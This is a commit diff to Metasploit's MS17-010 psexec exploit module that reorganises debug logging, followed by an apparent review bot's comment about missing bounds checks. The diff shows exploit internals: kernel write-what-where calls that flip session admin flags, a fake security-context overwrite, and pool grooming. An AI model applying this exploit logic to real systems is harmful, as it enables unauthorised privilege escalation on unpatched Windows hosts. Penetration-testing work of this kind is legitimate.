
Commit 24a79ae

author
zerosum0x0
committed
clean up DBGTRACE
1 parent a321a70 commit 24a79ae

1 file changed

+13
-26
lines changed


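--- a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
+++ b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
@@ -47,11 +47,10 @@ def eternal_pwn(ip)
 fmt = @ctx['PTR_FMT']
 
 # IsNullSession = 0, IsAdmin = 1
-write_what_where("\x00\x01", @ctx['session'] + @ctx['SESSION_ISNULL_OFFSET'])
+poffset = @ctx['session'] + @ctx['SESSION_ISNULL_OFFSET']
+write_what_where("\x00\x01", poffset)
 
-if datastore['DBGTRACE']
-vprint_status("Overwrote IsNullSession = 0, IsAdmin = 1")
-end
+vprint_status("Overwrote IsNullSession = 0, IsAdmin = 1 at 0x#{poffset.to_s(16)}")
 
 modify_token()
 
@@ -89,18 +88,13 @@ def modify_token()
 # read session struct to get SecurityContext address
 sessionData = read_data(@ctx['session'], 0x100)
 
+secCtxAddr = sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1].unpack(@ctx['PTR_FMT'])[0]
+
 if datastore['DBGTRACE']
 vprint_status("Session Data: #{bin_to_hex(sessionData)}")
 vprint_status("session dat len = #{sessionData.length}")
 vprint_status("Session ctx offset = #{@ctx['SESSION_SECCTX_OFFSET'].to_s(16)}")
 vprint_status("Session ctx data = #{bin_to_hex(sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1])}")
-
-end
-#value = leakTrans[0x8..-1].unpack(ptrf * 5) #unpack_from('<'+ptrf*5, leakTrans, 8)
-#secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
-secCtxAddr = sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1].unpack(@ctx['PTR_FMT'])[0]
-
-if datastore['DBGTRACE']
 vprint_status("secCtxAddr: #{secCtxAddr.to_s(16)}")
 end
 
@@ -160,9 +154,8 @@ def modify_token()
 
 # see FAKE_SECCTX detail at top of the file
 write_what_where(@ctx['FAKE_SECCTX'], secCtxAddr)
-if datastore['DBGTRACE']
-vprint_status("Overwrote fake secctx")
-end
+
+vprint_status("Overwrote token SID security context with fake context")
 end
 
 end
@@ -290,9 +283,6 @@ def exploit_matched_pairs(pipe_handle)
 # groom: srv buffer header
 @ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])
 
-if datastore['DBGTRACE']
-vprint_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
-end
 
 # groom paramters and data is alignment by 8 because it is NT_TRANS
 @ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)
@@ -301,7 +291,9 @@ def exploit_matched_pairs(pipe_handle)
 bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']
 @ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])
 
+
 if datastore['DBGTRACE']
+vprint_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
 vprint_status("BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}")
 end
 
@@ -314,9 +306,8 @@ def exploit_matched_pairs(pipe_handle)
 for i in 0..datastore['LEAKATTEMPTS']
 reset_extra_multiplex_id()
 
-if datastore['DBGTRACE']
-vprint_status("Attempting leak ##{i.to_s}")
-end
+
+vprint_status("Attempting leak ##{i.to_s}")
 
 leakInfo = align_transaction_and_leak(pipe_handle)
 
@@ -702,19 +693,15 @@ def exploit_fish_barrel(pipe_handle)
 print_status("<---------------- | Leaving Danger Zone | ---------------->")
 print_status("Reading from CONNECTION struct at: 0x#{connection_addr.to_s(16)}")
 
+trans2_addr = inparam_value - @ctx['TRANS_SIZE'] - xTRANS_NAME_LEN
+trans1_addr = trans2_addr - xTRANS_CHUNK_SIZE * 2
 
 if datastore['DBGTRACE']
 vprint_status("CONNECTION: 0x#{connection_addr.to_s(16)}")
 vprint_status("SESSION: 0x#{session_addr.to_s(16)}")
 vprint_status("FLINK: 0x#{flink_value.to_s(16)}")
 vprint_status("InData: 0x#{indata_value.to_s(16)}")
 vprint_status("MID: 0x#{trans2_mid.to_s(16)}")
-end
-
-trans2_addr = inparam_value - @ctx['TRANS_SIZE'] - xTRANS_NAME_LEN
-trans1_addr = trans2_addr - xTRANS_CHUNK_SIZE * 2
-
-if datastore['DBGTRACE']
 vprint_status("TRANS1: 0x#{trans1_addr.to_s(16)}")
 vprint_status("TRANS2: 0x#{trans2_addr.to_s(16)}")
 end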
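Review bot: In modify_token the moved line `secCtxAddr = sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1].unpack(@ctx['PTR_FMT'])[0]` (new line 91) still has no check that read_data returned enough bytes: if sessionData is shorter than the offset the slice is nil and unpack raises NoMethodError, and if it is too short for a full pointer unpack yields nil so the later `secCtxAddr.to_s(16)` and the write_what_where in the next hunk fail with an unhelpful error instead of a clear one. A guard directly after the read_data call would make the failure explicit, e.g. `raise "short SESSION read: #{sessionData.to_s.length} bytes" if sessionData.nil? || sessionData.length <= @ctx['SESSION_SECCTX_OFFSET']`. Whether read_data can actually return a short buffer cannot be confirmed from this hunk, and modify_token begins and ends outside it. As a point of style, the DBGTRACE gate is kept around the vprint_status calls here and in exploit_matched_pairs and exploit_fish_barrel but dropped around the ones in eternal_pwn and the end of modify_token; if that is intentional because vprint_status is already verbose-gated, a one-line comment at the first remaining gate saying which messages DBGTRACE is meant to cover would save the next reader the same question.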
